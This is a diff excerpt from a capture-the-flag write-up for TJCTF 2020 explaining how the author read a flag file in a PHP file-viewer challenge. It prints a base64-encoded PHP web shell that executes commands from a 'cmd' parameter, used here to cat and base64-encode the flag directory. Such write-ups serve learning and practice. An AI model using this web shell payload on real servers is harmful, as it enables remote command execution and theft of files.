W3rni0/TJCTF_2020/readme.md

 ![](assets//images//file_viewer_5.png)

 ```
-We found our flag, now for us to read the flag we need to decode the file to base 64.
+We found our flag, now for us to read the flag we need to encode the file to base64.
 The reason is that if we read a PHP file without encoding it the file will be executed
 beacuse the web browser reads the content of the file as code and not text, I used the following payload for that:
 PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=&cmd=cat i_wonder_whats_in_here/* | base64